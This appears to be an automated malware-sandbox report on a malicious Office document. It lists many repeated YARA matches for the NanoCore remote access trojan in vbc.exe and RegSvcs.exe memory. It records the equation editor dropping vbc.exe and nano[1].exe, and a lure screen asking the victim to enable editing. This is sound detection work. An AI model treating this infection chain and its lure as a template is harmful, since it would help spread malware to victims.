Source: 00000009.00000002.691091752.0000000000DA0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.488023420.0000000003A27000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.690646997.00000000006E0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.690837400.0000000000A00000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691004471.0000000000C90000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.690718899.0000000000740000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691135916.0000000000DD0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691058748.0000000000D40000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691079104.0000000000D90000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.691445743.0000000002781000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.487642134.0000000003681000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 2364, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2624, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing from the 17 t I yellow bar above 18 4 This document is 19 N " ? T : ? protected
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe Jump to dropped file
Yara signature match
Source: 9.2.RegSvcs.exe.d30000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.d30000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.dd0000.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.dd0000.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.d40000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.d40000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.2796198.16.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2796198.16.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.da0000.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.da0000.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.a00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.a00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.da0000.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.da0000.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.800000.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.800000.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.a00000.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.a00000.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.vbc.exe.3981e88.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.RegSvcs.exe.dd0000.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.dd0000.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.e30000.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.740000.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.740000.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.2390000.14.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2390000.14.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.2390000.14.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.2390000.14.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.740000.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.740000.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.398b838.20.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.398b838.20.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.c90000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.c90000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.3973018.18.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.3973018.18.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.398b838.20.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.398b838.20.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.d40000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.d40000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.e34629.12.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.d90000.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.d90000.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.d90000.8.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.d90000.8.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.27a23d8.15.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.27a23d8.15.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.4784c9f.21.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.4784c9f.21.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.4780000.22.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.4780000.22.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.6e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.6e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.c90000.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.c90000.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.RegSvcs.exe.e30000.11.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
